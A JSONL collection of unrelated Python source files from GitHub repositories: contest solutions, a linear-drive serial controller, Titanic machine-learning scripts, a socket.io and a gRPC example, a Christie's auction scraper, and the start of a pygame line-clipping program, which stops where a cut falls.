+{"seq_id":"7072845219","text":"# Contest No.: 632\n# Problem No.: C\n# Solver: JEMINI\n# Date: 20200409\n\nimport sys\n\ndef main():\n    n = int(input())\n    nums = list(map(int, sys.stdin.readline().split()))\n    ans = 0\n    invalidRange = []\n    for i in range(n - 1):\n        for j in range(len(nums)):  # minimal fix: range() needs an int; the original passed the list itself\n            if nums[i] != 0:\n                ans += 1\n            else:\n                invalidRange.append((j, j + i))\n    \n    print(ans)\n    return\n\nif __name__ == \"__main__\":\n    main()","repo_name":"Jinmin-Goh/Codeforces","sub_path":"#632_Div_2/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"6575448041","text":"t = int(input())\nwhile t > 0:\n    t-=1\n    s = str(input())\n    sum = 0\n    b = []\n    for i in range(len(s)):\n        if(s[i] >= '0' and s[i] <= '9'):\n            sum += (ord(s[i])-48)\n        else:\n            b.append(s[i])\n    b.sort()\n    for i in b:\n        print(i, end='')\n    print(sum)","repo_name":"bakachanbaby/code_ptit","sub_path":"tinh_tong_cac_chu_so.py","file_name":"tinh_tong_cac_chu_so.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"14859461788","text":"\"\"\"\nThis module contains the class LinearDrive, an abstraction layer over linear\ndrives built upon technosoft servos.\n\"\"\"\nimport math\nimport time\nimport struct\n\nimport serial as s\n\nfrom technosoftlineardrive.assemblyprogram import create_linear_drive_program\n\n# Constants\nTRANSFER_OK = 79\nTRANSFER_BAD = 13\nSYNC_DATA = 13\nSYNC_OK = 13\nMAX_RESYNC_ATTEMPTS = 10\nUNITS_PER_MM = 167.52\nUNITS_PER_MM_PER_S = 0.16752\nUNITS_PER_MM_PER_S_SQUARED = 0.00016752\nRAIL_LENGTH = 744.0 # mm\n\nRESET_SPEED = 74 # mm/s\nRESET_DISTANCE = 800 # mm\n\ndef assert_numerical(x):\n    \"\"\"\n    Assert that a number is numeric. Throws an exception otherwise.\n    \n    :param x: object to check.\n    \"\"\"\n    if not (type(x) is float or type(x) is int):\n        raise Exception(\"LinearDrive was given a non-numerical value. 
Please send an int or a float.\")\n\nclass LinearDrive:\n \"\"\"\n Abstraction layer over a linear drive built upon technosoft servos.\n \n :Example:\n\n >>> ld = LinearDrive()\n >>> ld.goto_position(500)\n\n \"\"\"\n def __init__(self, device_path='/dev/ttyUSB0'):\n \"\"\"\n Constructor for the Linear Drive.\n \n :param device_path: serial device to use\n \"\"\"\n self.device = s.Serial(device_path,\n 115200,\n timeout=1.0)\n self.__current_position = 0\n self.speed = 200 # mm/s\n self.acceleration = 500 # mm/s^2\n self.reset_position()\n\n def __calculate_movement_time(self, distance):\n distance /= UNITS_PER_MM\n accel_time = self.speed / self.acceleration\n accel_dist = self.acceleration * (accel_time**2.0) / 2\n return 2*accel_time + (abs(distance) - 2*accel_dist)/self.speed\n\n def __send_data(self, data):\n for line in data:\n self.__send_data_line(line)\n\n\n def __send_data_line(self, data):\n data_package = struct.pack(\"\")\n for byte in data:\n data_package += struct.pack(\"B\", byte)\n\n # Send data package\n send = lambda: self.device.write(data_package)\n send()\n while self.__transfer_response() != TRANSFER_OK:\n self.__sync()\n send()\n\n\n def __sync(self):\n for _ in range(MAX_RESYNC_ATTEMPTS):\n self.device.write(struct.pack(\"B\", SYNC_DATA))\n time.sleep(0.1)\n if self.__transfer_response() == SYNC_OK:\n return True\n\n raise Exception(\"Could not resync to linear drive\")\n\n def __transfer_response(self):\n return struct.unpack(\"B\", self.device.read(1))[0]\n\n def __move_to_unit_position(self, desired_position):\n move_amount = desired_position - self.__current_position\n self.__current_position = desired_position\n self.__move(move_amount)\n return self.__calculate_movement_time(move_amount)\n\n def __move(self, move_amount):\n speed = self.speed * UNITS_PER_MM_PER_S\n acceleration = self.acceleration * UNITS_PER_MM_PER_S_SQUARED\n self.__send_data(create_linear_drive_program(-move_amount,\n acceleration=acceleration,\n speed=speed))\n def set_speed(self, speed):\n \"\"\"\n Set the speed of the linear drives movement in millimeters per second.\n \n :param speed: to move the linear drive with. \n \"\"\"\n assert_numerical(speed)\n if speed <= 0:\n raise Exception(\"LinearDrive cannot do non-positive speeds.\")\n self.speed = speed\n\n def get_speed(self):\n \"\"\"\n Get the currently set speed of the linear drive in millimeters per second.\n \n :return speed: the linear drive is set to move with.\n \"\"\"\n \n return self.speed\n\n def reset_position(self):\n \"\"\"\n Reset the linear drive to it's zero position. This will move the linear\n drive to the leftmost position and reset the internal counter.\n\n :return seconds: The number of seconds until it's safe to assume the\n camera has been reset.\n\n \"\"\"\n # Set a separate reset speed to increase accuracy.\n pre_reset_speed = self.speed\n self.speed = RESET_SPEED\n\n self.__move(math.floor(-RESET_DISTANCE*UNITS_PER_MM)) # Move to negative max\n self.__current_position = 0\n\n maximum_time = self.__calculate_movement_time(RESET_DISTANCE*UNITS_PER_MM)\n\n self.speed = pre_reset_speed\n return maximum_time\n\n def goto_position(self, position):\n \"\"\"\n Move the linear drive to the specified position. 
The position is specified\n in millimeters.\n\n :param position: to move linear drive to.\n :return time: it will take to move to position.\n \"\"\"\n assert_numerical(position)\n position = min(position, RAIL_LENGTH)\n position = max(position, 0)\n position = math.floor(position * UNITS_PER_MM)\n return self.__move_to_unit_position(position)\n\n def goto_relative_position(self, position):\n \"\"\"\n Move the linear drive to a position relative the current position. Distance\n is given in millimeters.\n\n :param position: to move from current position.\n :return time: it will take to move to position.\n \"\"\"\n assert_numerical(position)\n return self.goto_position(self.get_current_position() + position)\n\n\n def get_current_position(self):\n \"\"\"\n Return the current position of the linear drive. The position is given in\n millimeters from the linear drives leftmost position.\n \n :return postition: of the linear drive. \n \"\"\"\n return self.__current_position / UNITS_PER_MM\n\n","repo_name":"PUM-9/TreeD","sub_path":"technosoft-linear-drive/src/technosoftlineardrive/lineardrive.py","file_name":"lineardrive.py","file_ext":"py","file_size_in_byte":5747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8758905005","text":"\nfrom semi_auto_ml.utils.extract_funcs import save_sk_model,load_sk_model\nfrom sklearn.pipeline import Pipeline\nimport os\n\nclass ModelDeploy():\n '''\n save tratnsform and predict model,not contain feature_tools\n '''\n @staticmethod\n def save_model(model_path:tuple,save_path):\n '''\n save all model to file,except feature_tools\n '''\n for ind,item in enumerate(model_path):\n file_path = save_path+f'{ind}_m.joblib'\n if hasattr(item,'save'):\n item.save(file_path)\n else:\n save_sk_model(item,file_path)\n\n @staticmethod\n def load_model(save_path):\n '''\n from save_path load all joblib table,and generate pipeline by name\n '''\n pips = []\n models = sorted([ml for ml in os.listdir(save_path) if ml.endswith('joblib')],key=lambda x:int(x[0]))\n for ind,item in enumerate(models):\n file_path = save_path+item\n clf = load_sk_model(file_path)\n pips.append((f'{ind}_m',clf))\n return Pipeline(pips)\n\n\n","repo_name":"lphcreat/semi_auto_ml","sub_path":"semi_auto_ml/model_deploy.py","file_name":"model_deploy.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24831587649","text":"# 0. Load required modules:\nimport os\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.impute import SimpleImputer # Imputation Transformer\nfrom sklearn.preprocessing import OrdinalEncoder, StandardScaler # Encoding Transformers\nfrom sklearn.compose import ColumnTransformer\nfrom lightgbm import LGBMClassifier\nimport pickle\nimport numpy as np\nfrom google.cloud import storage\n\n# 1. Dataset preparation\ndf = pd.read_csv(\"https://raw.githubusercontent.com/pankajrsingla/vertexai_ml6/main/data/titanic.csv\")\n\nFEATURES = ['Pclass', 'Sex', 'Age', 'Fare', 'Embarked']\nTARGET = 'Survived'\ntrain_df, test_df = train_test_split(df, train_size=0.7,\n shuffle=True, random_state=42)\nX_train, y_train = train_df[FEATURES], train_df[TARGET]\nX_test, y_test = test_df[FEATURES], test_df[TARGET]\n\n# 2. 
Data preprocessing\nnumerical_features = ['Age', 'Fare', 'Pclass']\ncategorical_features = ['Sex', 'Embarked']\n\n# 2.1 Creating a preprocessing pipeline\n\n# 2.1.1 Defining the categorical pipeline\n# steps of the pipeline have the form: ('name', TransformerObject)\n# handle_unknown in OrdinalEncoder is required for Vertex AI predictions.\ncategorical_pipe = Pipeline(steps=[\n ('imputer', SimpleImputer(strategy='most_frequent')),\n ('encoder', OrdinalEncoder(categories='auto', handle_unknown='use_encoded_value', unknown_value = np.nan))\n])\n\n# 2.1.2 Defining the numerical pipeline\nnumerical_pipe = Pipeline(steps=[\n ('imputer', SimpleImputer(strategy='mean')),\n ('normalizer', StandardScaler())\n])\n\n# 2.1.3 Combining the two pipilines\npreprocessing_pipe = ColumnTransformer(\n transformers=[\n # ('name', Transformer, [column names])\n ('num', numerical_pipe, numerical_features),\n ('cat', categorical_pipe, categorical_features)]\n)\n\n# 2.1.4 Adding the LightGBM classifier to the pipeline\nfull_pipe = Pipeline(steps=[\n ('preprocessor', preprocessing_pipe),\n ('clf', LGBMClassifier(n_estimators=20, random_state=42))\n])\n\n# 3. Train the model using full_pipe\nmodel = full_pipe.fit(X_train, y_train)\n\nprint(f'Train accuracy: {model.score(X_train, y_train):.2f}')\nprint(f'Test accuracy: {model.score(X_test, y_test):.2f}')\n\n# 4. For hyperparameter tuning and explainability, refer to\n# https://github.com/ml6team/quick-tips/blob/main/structured_data/2021_02_26_scikit_learn_pipelines/scikit_learn_pipelines_and_lightgbm_titanic_dataset.ipynb\n\n# 5. Save the model to GCP bucket:\n","repo_name":"pankajrsingla/vertexai_ml6","sub_path":"skl-lgbm/training/trainer/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"906103565","text":"\"\"\"\nThe sinking of the RMS Titanic is one of the most infamous shipwrecks in history. On April 15, 1912, during her maiden voyage, \nthe Titanic sank after colliding with an iceberg, killing 1502 out of 2224 passengers and crew. This sensational tragedy shocked the \ninternational community and led to better safety regulations for ships. One of the reasons that the shipwreck led to such loss of life \nwas that there were not enough lifeboats for the passengers and crew. Although there was some element of luck involved in surviving the\nsinking, some groups of people were more likely to survive than others, such as women, children, and the upper-class. In this challenge, \nwe ask you to complete the analysis of what sorts of people were likely to survive. In particular, we ask you to apply the tools of \nmachine learning to predict which passengers survived the tragedy. 
\n\"\"\"\n\n#Since code is written in Jupyter Notebook, print statements will be missing at some places\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score,confusion_matrix,classification_report\nfrom sklearn.model_selection import train_test_split\n\ntrain = pd.read_csv('../../../../train.csv')\ntest = pd.read_csv('../../../../test.csv')\ntrain.head()\n\n#Checking if any Null Values exist\nprint(train.isnull().sum())\n\n#Visualizing survived vs not-survived\nsns.countplot(x='Survived',data=train)\n\n#Which Gender was more in ship\nsns.countplot(x='Sex',data=train)\n\n#Finding count of female and male persons\ntrain[train['Sex']=='female'].count()\ntrain[train['Sex']=='male'].count()\n\n#Checking which class had max population\nsns.countplot(x='Pclass',data=train)\n\n#People of which class survived more\nsns.countplot(data=train,hue='Pclass',x='Survived')\n\n#Which Gender survived more\nsns.countplot(x='Survived',hue='Sex',data=train)\n\n#Getting statistical details about data\ntrain.describe()\n\ntrain2 = train.copy()\n#Preparing data now\n\n#First filling mean age to null values of Age column\ntrain2['Age']=train2['Age'].fillna((int(train2['Age'].mean())))\n\n#Since Cabin column has very high quantity of null values and also it doesn't seems that important, so dropping that column\ntrain2.drop('Cabin',axis=1,inplace=True)\n\n#Embarked column has only 2 null values , so going for mode we got \"S\" is most occured\ntrain2['Embarked'].mode()\ntrain2['Embarked'].fillna(\"s\", inplace = True) \n\nprint(train2.isnull().sum()) # Got that no null value exists now\n\n#Changing data to numeric one; Changing column-> Sex,PClass and Embarked\nsex = pd.get_dummies(train2[\"Sex\"])\nembarked = pd.get_dummies(train2[\"Embarked\"])\npclass = pd.get_dummies(train2[\"Pclass\"])\n\n#Concating new data\ntrain2=pd.concat([train2,pclass,sex,embarked],axis=1)\n\n#Dropping not much-useful columns \ntrain2.drop([\"PassengerId\",\"Pclass\",\"Name\",\"Sex\",\"Ticket\",\"Embarked\"],axis=1,inplace=True)\n\n#Our data is ready now. 
Starting model training\n\nx = train2.drop(\"Survived\",axis=1)\ny = train2[\"Survived\"]\n\ntrain_x,test_x,train_y,test_y = train_test_split(x,y,test_size=.2,random_state=52)\nlg=LogisticRegression()\nlg.fit(train_x,train_y)\nprint(lg.score(train_x,train_y)) # 0.8061797752808989\n\n# Trying with other models\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier\n\ngnb = GaussianNB()\ngnb.fit(train_x,train_y)\nprint(gnb.score(train_x,train_y)) # 0.7865168539325843\n\nknn = KNeighborsClassifier()\nknn.fit(train_x,train_y)\nprint(knn.score(train_x,train_y)) # 0.800561797752809\n\nsvc = SVC()\nsvc.fit(train_x,train_y)\nprint(svc.score(train_x,train_y)) # 0.9002808988764045\n\nrf = RandomForestClassifier()\nrf.fit(train_x,train_y)\nprint(rf.score(train_x,train_y)) # 0.9691011235955056\n\ndt = DecisionTreeClassifier()\ndt.fit(train_x,train_y)\nprint(dt.score(train_x,train_y)) # 0.9845505617977528 The best we got still\n\npred = dt.predict(test_x)\nprint(pred)\n\nprint(accuracy_score(test_y,pred)) # 0.7541899441340782\nprint(confusion_matrix(test_y,pred))\n\n# Saving this model\nimport pickle\n\nfo = open('ti.obj','wb')\npickle.dump(dt,fo)\nfo.close()\n\nfl = open('ti.obj','rb')\nres = pickle.load(fl)\nfl.close()\n\nprint(res.score(train_x,train_y)) # 0.9845505617977528\n\n\n\n\n\n","repo_name":"nikzzastic/DS-Assignments_Projects","sub_path":"Assignment 3(Titanic).py","file_name":"Assignment 3(Titanic).py","file_ext":"py","file_size_in_byte":4373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14034035252","text":"from collections import Iterable, Iterator, Container\nclass Reverse:\n \n def __init__(self, data):\n self.data = data\n self.index = len(data)\n \n def __iter__(self):\n return self\n\n def __next__(self):\n if self.index == 0:\n raise StopIteration\n self.index = self.index-1\n return self.data[self.index]\n\nrev = Reverse('bubbyqi')\nwhile True:\n try:\n x = next(rev)\n print(x)\n except StopIteration:\n break","repo_name":"bubbyqi/python","sub_path":"iterator.py","file_name":"iterator.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16156587860","text":"from aiohttp import web\nimport socketio\nimport json\n\nsio = socketio.AsyncServer(cors_allowed_origins='*')\napp = web.Application()\nsio.attach(app)\n\nasync def index(request):\n \"\"\"Serve the client-side application.\"\"\"\n with open('index.html') as f:\n return web.Response(text=f.read(), content_type='text/html')\n\n@sio.event\ndef connect(sid, environ):\n print(\"connect \", sid)\n\n# @sio.event\n# async def chat_message(sid, data):\n# print(\"message \", data)\n\n@sio.event\ndef disconnect(sid):\n print('disconnect ', sid)\n\n@sio.on(\"input\")\nasync def echo_input(sid, data):\n print(\"Server received message\", sid, data)\n parsed_data = json.loads(data)\n echo_msg = parsed_data[\"command\"]\n await sio.emit(\"input-response\", echo_msg)\n\napp.router.add_get('/', index)\n\nif __name__ == '__main__':\n web.run_app(app)","repo_name":"uyentruong-iceye/cli-emulator","sub_path":"xterm-server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 
+{"seq_id":"3731120154","text":"#!/usr/bin/env python\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import TimeoutException, NoSuchElementException\nimport requests\nimport hashlib\nimport io\nimport time\nimport os\nimport sys\nimport csv\n\n\ndef accept_cookies():\n try:\n allow_cookies = wd.find_element_by_css_selector(\n \"#onetrust-accept-btn-handler\")\n allow_cookies.click()\n except Exception as e:\n pass\n\n\ndef close_signup():\n try:\n close_button = wd.find_element_by_css_selector(\n \"#close_signup\")\n close_button.click()\n except Exception as e:\n pass\n\n\ndef scroll_to_bottom(wd):\n wd.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n\n\ndef wait_for_elements(wait):\n try:\n wait.until(\n lambda wd:\n EC.presence_of_element_located(\n (By.CSS_SELECTOR, \".chr-auction-header__auction-title\")) and\n EC.presence_of_all_elements_located(\n (By.CSS_SELECTOR, \".chr-lot-tile__link\")) and\n EC.presence_of_element_located(\n (By.CSS_SELECTOR, '[data-title=\"Browse Lots\"], [data-track=\"page_nav|lots\"]'))\n )\n except Exception as e:\n print(f\"wait exception: {e}\")\n\n\ndef get_auction_title(wd):\n try:\n\n auction_title_element = WebDriverWait(wd, 5).until(\n EC.presence_of_element_located((By.CSS_SELECTOR,\n \".chr-auction-header__auction-title\"))\n )\n\n # auction_title_element = wd.find_element_by_css_selector(\n # \".chr-auction-header__auction-title\")\n\n return auction_title_element.text.lower()\n except Exception as e:\n print(f\"auction title error: {e}\")\n return \"\"\n\n# def get_piece_titles(wd):\n# try:\n# title_elements = wd.find_elements_by_xpath(\n# \"//*[@class='chr-lot-tile__primary-title']\")\n\n# return [e.text.lower().strip() for e in title_elements]\n\n# except TimeoutException as e:\n# print(f\"piece titles error {e}\")\n# return []\n# except NoSuchElementException as e:\n# print(f\"piece titles error {e}\")\n# return []\n\n\ndef get_num_lots(wd):\n try:\n lot_num_text = WebDriverWait(wd, 5).until(\n EC.presence_of_element_located((By.CSS_SELECTOR,\n '[data-title=\"Browse Lots\"], [data-track=\"page_nav|lots\"]'))\n ).text\n\n # lot_num_text = wd.find_element_by_css_selector(\n # '[data-title=\"Browse Lots\"], [data-track=\"page_nav|lots\"]').text\n\n return int(''.join(c for c in lot_num_text if c.isdigit()))\n except Exception as e:\n print(f\"num lots error {e}\")\n return 0\n\n\ndef scrape_auction(wd, link, keyword_dict):\n wd.get(link)\n\n accept_cookies()\n close_signup()\n scroll_to_bottom(wd)\n\n asian_piece_count = 0\n\n auction_title = get_auction_title(wd)\n print(f\"\\nAuction Title: {auction_title}\")\n\n num_lots = get_num_lots(wd)\n print(f\"\\nNum Lots: {num_lots}\")\n\n match = False\n\n for keyword in keyword_dict:\n\n if keyword in auction_title:\n\n match = True\n\n keyword_dict[keyword] += num_lots\n\n if match:\n asian_piece_count += num_lots\n\n return (asian_piece_count, num_lots, 1 if match else 0)\n\n\ndef scrape_auctions(wd, auction_links, keyword_dict):\n\n asian_piece_count = 0\n total_piece_count = 0\n asian_auction_count = 0\n\n for link in auction_links:\n\n result = scrape_auction(wd, link, keyword_dict)\n asian_piece_count += result[0]\n total_piece_count += result[1]\n asian_auction_count += result[2]\n\n print(keyword_dict)\n\n return (asian_piece_count, total_piece_count, asian_auction_count, 
len(auction_links))\n\n\ndef scrape_christies(year):\n\n print(f\"FOR YEAR {year}\\n\")\n\n keyword_dict = {\"chinese\": 0,\n \"china\": 0,\n \"korean\": 0,\n \"korea\": 0,\n \"japanese\": 0,\n \"japan\": 0,\n \"orient\": 0,\n \"dynasty\": 0,\n \"asian\": 0,\n \"asia\": 0,\n \"year\": year}\n\n result_dict = {\n \"asian_piece_count\": 0,\n \"total_piece_count\": 0,\n \"piece_ratio\": 0.0,\n \"asian_auction_count\": 0,\n \"total_auction_count\": 0,\n \"auction_ratio\": 0.0,\n \"year\": year,\n }\n\n base_url = \"https://www.christies.com/en/results?\"\n\n for month in range(1, 13):\n\n print(F\"\\nMONTH {month}\\n\")\n\n wd.get(f\"{base_url}month={month}&year={year}\")\n\n accept_cookies()\n close_signup()\n\n try:\n auction_link_elements = wd.find_elements_by_css_selector(\n \".chr-event-tile__title\")\n\n auction_links = [e.get_attribute('href')\n for e in auction_link_elements]\n\n result = scrape_auctions(wd,\n auction_links, keyword_dict)\n\n result_dict[\"asian_piece_count\"] += result[0]\n result_dict[\"total_piece_count\"] += result[1]\n result_dict[\"piece_ratio\"] = result_dict[\"asian_piece_count\"] / \\\n result_dict[\"total_piece_count\"]\n\n result_dict[\"asian_auction_count\"] += result[2]\n result_dict[\"total_auction_count\"] += result[3]\n result_dict[\"auction_ratio\"] = result_dict[\"asian_auction_count\"] / \\\n result_dict[\"total_auction_count\"]\n\n print(result_dict)\n print(keyword_dict)\n\n except Exception as e:\n print(f\"{e} for year {year} and month {month}\")\n\n filename = \"new_christies_auction_keywords.csv\"\n fields = list(keyword_dict.keys())\n file_exists = os.path.isfile(filename)\n\n write_to_csv(filename, fields, file_exists, keyword_dict)\n\n filename = \"new_christies_auction_overall.csv\"\n fields = list(result_dict.keys())\n file_exists = os.path.isfile(filename)\n\n write_to_csv(filename, fields, file_exists, result_dict)\n\n\ndef write_to_csv(filename, fields, file_exists, data):\n with open(filename, 'a') as csvfile:\n # creating a csv dict writer object\n writer = csv.DictWriter(csvfile, fieldnames=fields)\n\n if not file_exists:\n writer.writeheader() # file doesn't exist yet, write a header\n\n # writing data rows\n writer.writerows([data])\n\n\nCHROMEDRIVER_PATH = \"./drivers/chromedriver\"\nchrome_bin = os.environ.get(\"GOOGLE_CHROME_BIN\", \"chromedriver\")\noptions = webdriver.ChromeOptions()\noptions.binary_location = \"/Applications/Google Chrome.app/Contents/MacOS/Google Chrome\"\noptions.add_argument(\"--headless\")\nwd = webdriver.Chrome(executable_path=CHROMEDRIVER_PATH,\n options=options)\n\ntry:\n scrape_christies(sys.argv[1])\nexcept Exception as e:\n print(e)\n\nwd.quit()\n","repo_name":"alexwang177/art-scraper","sub_path":"python_scripts/art_scrape.py","file_name":"art_scrape.py","file_ext":"py","file_size_in_byte":7090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40193378824","text":"# Script to train machine learning model.\nfrom joblib import dump, load\nfrom sklearn.model_selection import train_test_split\nfrom starter.ml.data import process_data\nfrom starter.ml.model import *\nimport pandas as pd\n\n# Add the necessary imports for the starter code.\n# Add code to load in the data.\ndef get_model(data_path: str,output_path: str, feature: str):\n data=pd.read_csv(data_path)\n # Optional enhancement, use K-fold cross validation instead of a train-test split.\n train, test = train_test_split(data, test_size=0.20)\n\n cat_features = [\n \"workclass\",\n 
\"education\",\n \"marital-status\",\n \"occupation\",\n \"relationship\",\n \"race\",\n \"sex\",\n \"native-country\",\n ]\n\n # Proces the test data with the process_data function.\n X_train, y_train, encoder, lb = process_data(\n train, categorical_features=cat_features, label=\"salary\", training=True\n )\n X_test, y_test,encoder,lb = process_data(\n test, categorical_features=cat_features, label=\"salary\", training=False, encoder=encoder,lb=lb)\n # Train and save a model.\n lg=train_model(X_train,y_train)\n preds=inference(lg,X_test)\n precision, recall, fbeta = compute_model_metrics(y_test, preds)\n dump(lg,str(output_path + 'model.pkl'))\n dump(encoder,str(output_path + 'encoder.pkl'))\n dump(lb,str(output_path + 'lb.pkl'))\n with open('slice_output.txt', 'w') as f:\n for val in test[feature].unique():\n df=test[test[feature] == val]\n X, y, encoder, lb = process_data(\n df, categorical_features=cat_features, label=\"salary\", training=False,encoder=encoder,lb=lb)\n preds=inference(lg,X)\n precision_, recall_, fbeta_ = compute_model_metrics(y, preds)\n f.write(f\"score for {val}: precision: {precision_} recall: {recall_} fbeta: {fbeta_} \\n\")\n return precision, recall, fbeta \n\"\"\"\ndef splice_testing(data_path: str, model_path: str, feature: str) -> None:\n cat_features = [\n \"workclass\",\n \"education\",\n \"marital-status\",\n \"occupation\",\n \"relationship\",\n \"race\",\n \"sex\",\n \"native-country\",\n ]\n model=load(model_path)\n data=pd.read_csv(data_path)\n train, test = train_test_split(data, test_size=0.20)\n X_train, y_train, encoder, lb = process_data(\n train, categorical_features=cat_features, label=\"salary\", training=True)\n with open('../slice_output.txt', 'w') as f:\n for val in test[feature].unique():\n df=test[test[feature] == val]\n X, y, encoder, lb = process_data(\n df, categorical_features=cat_features, label=\"salary\", training=False,encoder=encoder,lb=lb)\n preds=inference(model,X)\n precision, recall, fbeta = compute_model_metrics(y, preds)\n f.write(f\"score for {val}: precision: {precision} recall: {recall} fbeta: {fbeta} \\n\")\n\"\"\"","repo_name":"nadorijakab/feladat","sub_path":"starter/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":2854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17214053764","text":"class Solution:\n def isScramble(self, s1, s2):\n \"\"\"\n you just have to recursively compare all the possible cases, and the question is not clear about how we can split the string, bad question\n \"\"\"\n memo = {}\n \n def helper(s1, s2):\n if not s1 or not s2: return False\n if s1 == s2: return True\n if sorted(s1) != sorted(s2): return False\n \n if (s1, s2) in memo: return memo[s1,s2]\n \n ans = False\n for i in range(len(s1)):\n if ((helper(s1[:i], s2[:i]) and helper(s1[i:], s2[i:])) or\n (helper(s1[:i], s2[-i:]) and helper(s1[i:], s2[:-i]))):\n ans = True\n break\n\n memo[(s1, s2)] = ans\n return ans\n \n return helper(s1, s2)","repo_name":"yunkaiwang/LeetCodeSol","sub_path":"algorithms/87_ScrambleString.py","file_name":"87_ScrambleString.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12054838199","text":"import timeit\n\nfrom gefest.core.opt.gen_design import design\nfrom cases.heat.configuration_dl import heat_sampler, heat_estimator\nfrom cases.main_conf import opt_params\n\n# If the value is False, pretrained models will 
be selected\n# otherwise put path to your model\nopt_params.path_to_sampler = False\nopt_params.path_to_estimator = False\n\n# ------------\n# GEFEST tools configuration\n# ------------\n\nestimator = heat_estimator.configurate_estimator(path_to_cnn=opt_params.path_to_estimator)\nsampler = heat_sampler.configurate_sampler(domain=None, path_to_sampler=opt_params.path_to_sampler)\noptimizer = None\n\n# ------------\n# Generative design stage\n# ------------\n\nstart = timeit.default_timer()\noptimized_pop = design(n_steps=opt_params.n_steps,\n                       pop_size=opt_params.pop_size,\n                       estimator=estimator,\n                       sampler=sampler,\n                       optimizer=optimizer)\nspend_time = timeit.default_timer() - start\nprint(f'spent time {spend_time} sec')\n","repo_name":"aimclub/GEFEST","sub_path":"cases/heat/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"53"}
+{"seq_id":"29099953259","text":"import weather_pb2, weather_pb2_grpc\nimport sys, os\nimport grpc\n\n\ndef main():\n    with grpc.insecure_channel(\"localhost:3333\", options=(('grpc.enable_http_proxy', 0),)) as chan:\n        stub = weather_pb2_grpc.ServiceStub(chan)\n        city = sys.argv[1]\n        res = stub.getWeather(weather_pb2.WeatherRequest(city=city))\n        val = int(res.temp_info)\n        print(f\"The temperature in {city} is {val} degrees\")\n\n\nif __name__ == \"__main__\":\n    main()","repo_name":"ternyavsky/rpc_python-go","sub_path":"client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"41431889731","text":"#1. Implement the Cyrus-Beck algorithm for clipping a segment against a polygon. ok\r\n#2. Implement the Cohen-Sutherland algorithm. ok\r\n#3. Implement the midpoint algorithm.\r\n\r\nimport sys,os,pygame,pygame_gui\r\nfrom math import tan,pi,fabs,atan2,sin,cos,copysign,sqrt\r\nfrom functools import partial\r\nfrom turtle import back, width\r\nsign = partial(copysign, 1)\r\ndef chsign(val:float):return -val\r\nfrom pygame import draw,display,time,quit,init,freetype,font\r\nfrom pygame_gui.core import UIElement\r\nfrom config import *\r\n\r\n# draw the coordinate grid\r\ndef decart():\r\n    _font:freetype.Font = freetype.SysFont(font.get_fonts()[0],12)\r\n    draw.line(background,RED,ToWorldCoords([DIS_WIDTH/2,0]),ToWorldCoords([-DIS_WIDTH/2,0]))\r\n    draw.line(background,RED,ToWorldCoords([0 ,DIS_HEIGHT/2]),ToWorldCoords([0,-DIS_HEIGHT/2]))\r\n    for x in range(-int(DIS_WIDTH/2),int(DIS_WIDTH/2)+PIX_SIZE,PIX_SIZE):\r\n        for y in range(-int(DIS_HEIGHT/2),int(DIS_HEIGHT/2)+PIX_SIZE,PIX_SIZE):\r\n            if y == 0 or x == 0:\r\n                draw.circle(background,LIGHT_BLUE,ToWorldCoords([x,y]),1)\r\n                text = _font.render(str(x) if y == 0 else str(y), fgcolor=LIGHT_BLUE,size=12)\r\n                background.blit(text[0],dest=ToWorldCoords([x-9,y-5]))\r\n\r\ndef set_rect(x,y,xs,ys):\r\n    return pygame.Rect(ToWorldCoords((DIS_WIDTH/2-x, DIS_HEIGHT/2-y)), (xs, ys))\r\n\r\ndef set_slider(x,y,xs=250,ys=25,sv=-DIS_WIDTH/2+5,ev=DIS_WIDTH/2-5,dv=0):\r\n    return pygame_gui.elements.UIHorizontalSlider(\r\n        relative_rect = set_rect(x,y,xs,ys),value_range=[sv,ev],start_value=dv,manager=manager)\r\n\r\ndef set_textbox(x,y,xs=50,ys=25):\r\n    return pygame_gui.elements.UITextEntryLine(relative_rect = set_rect(x,y,xs,ys),manager=manager)\r\n\r\ndef 